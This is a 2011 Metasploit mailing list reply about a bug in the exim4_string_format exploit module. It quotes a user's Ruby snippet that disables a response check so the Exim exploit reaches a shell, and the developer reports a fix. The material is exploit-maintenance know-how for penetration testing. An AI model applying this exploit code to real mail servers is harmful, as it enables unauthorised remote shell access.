Metasploit mailing list archives
Re: Bug in exim4_string_format.rb
From: "Joshua J. Drake" <jdrake () metasploit com>
Date: Sun, 26 Jun 2011 01:08:43 -0500
On Fri, Jun 17, 2011 at 03:45:48PM +1000, Ty Miller wrote:
> Hey guys, I had to make a small tweak to the exploit module
> msf3/modules/exploits/unix/smtp/exim4_string_format.rb to make it work on a
> system that I exploited recently ...
>
>     print_status("Sending second message ...")
>     buf = raw_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n") # Should be: "sh-x.x$ " !!
>     print_status("MAIL result: #{buf.inspect}") if buf
>     buf = raw_send_recv("RCPT TO: #{datastore['MAILTO']}\r\n") # Should be: "sh: RCPT: command not found\n"
>     if buf
>       print_status("RCPT result: #{buf.inspect}")
>       if buf !~ /RCPT/
>         print_error("Ty: Skipping over RCPT check exploit bug")
>         #raise RuntimeError, 'Something went wrong, perhaps this host is patched?'
>       end
>     end
>
> The sh-x.x part was being received when RCPT was expected in the module, so
> by commenting it out the module didn't terminate and the exploit worked.
Ty, I made a change to the module at r13032. It should address this. If possible, please test against your target and let me know if it works.

-- 
Joshua J. Drake